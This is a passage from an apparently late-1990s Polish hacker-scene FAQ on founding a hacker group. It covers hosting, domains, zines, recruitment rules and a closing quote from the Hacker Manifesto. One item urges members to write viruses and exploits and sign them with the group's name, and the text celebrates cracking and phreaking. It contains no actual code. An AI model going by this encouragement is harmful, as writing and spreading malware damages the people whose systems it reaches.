  jakim bezpatnym, lub wynaj wirtualny serwer (polecam jednak bezpatne konto).
  Wybierzcie serwer oferujcy conajmniej 10 MB (0.5/1/2 MB Odpada !!!)
  Gdy strona bdze gotowa, nadajcie jej jak domene - mona wykupi, lub zaatwi za darmo na:
  - WWW.PRV.PL
  - WWW.ALIAS.POLBOX.PL
5.Napiszcie swoje FAQ lub ZINA (najlepiej oba na raz...)
  Ale uwaga:
  - FAQ musi mie minimum 80 Kb czystego TXT !!!
  - Zin musi by napisany pod DOS'a (!), spakowany jakim pakerem EXE (wiecie chyba co to jest?)
    oraz musi by zabezpieczony hasem (dane bd bezpieczne, a wy bdzecie zalewani listami z prob
    o haso...) - haso dajcie tylko wybranym osob...
  Starajcie si, eby wasz Zin i FAQ byy atwo dostpne:
  - Dajcie je na swoj strone
  - Wylijcie na inne strony o hackerstwie
  - Wrzucie do udostpnionych katalogw FTP (na hackerskich serwerach)
  - Rozreklamujcie na IRC, CHATACH i grupach dyskusyjnych...
6.Musicie napisa peno jaki malutkich programikw (wirusy, exploity, programy przydatne hackerowi itp.)
  UWAGA:
  - Programy musz by podpisane nazw grupy (to nic e pisaa je godzinami jedna osoba...)
  - W programikach musi by podany adres strony WWW i email (grupy oczywicie...)
7.Po roku dziaalnoci, gdy zauwaycie e w grupie wszystko gra i jestecie znani
  w sieci, postarajcie si o nabr nowych czonkw, ale takich ktrzy:
  + Maj jak wiedze (nie przyjmujcie lamerw, bo oni mog osabi wasz grup)
  + Maj sensowny adres email:
    - Jako user nie maj imienia/nazwiska/itp. ale maj swj nick np: HACKER@HACKERNET.ORG
      ZYM adresem jest np. JKOWALSKI@LAMERIA.EDU.PL
    - Ignorujcie tych, ktrzy maj konto uczelniane (takie z EDU w adresie)
    - Ignorujcie tych, ktrzy WCALE nie maj swojego email'a, tylko pisz np. od qmpla...
  + S dobrzy w jakiej dziedzinie np. hack/crack/phreack/virii itp.
  + S atwo osigalni w internecie (maj dostp do internetu w DOMU !!!)
*********************************************************************


%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Jezeli nic nie zrozumiales to zanczy ze jestes skonczonym lamerem %%
%% i nic ci nie pomoze czytanie FAQ, wiec sobie daruj.               %%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


P.S Pozdrowienia dla Mr. Mangas'a i Vego

=============================================
{    JU NIEDUGO KOLEJNA WERSJA FAQ !!!    }
=============================================

PA-PA i niech HACK bdzie z wami...

THE TELEKOMUNA HAS YOU...
Follow the hack web... ;)

---------------------------------------------------------------------------------
Dzi mog ju przyczy si do znanego wszystkim hackerom cytatu:

"Budujesz bomby atomowe, wszczynasz wojny, mordujesz i oszukujesz,
 oklamujesz nas i probujesz nam wmowic ze to dla naszego dobra, a to my
 jestesmy przestepcami.

 Tak jestem przestepca. Moim przestepstwem jest ciekawosc.
 Moim przestepstwem jest ocenianie ludzi na podstawie tego co mowia i mysla,
 nie jak wygladaja. Moim przestepstwem jest to ze jestem madrzejszy od
 ciebie i nigdy mi tego nie wybaczysz. Jestem hackerem, a to jest moj
 manifest. Mozesz powstrzymac mnie, ale nie jestes w stanie powstrzymac
 nas wszystkich, bo przeciez wszyscy jestesmy tacy sami..."

                                                     -cytat z manifestu hackerw-
---------------------------------------------------------------------------------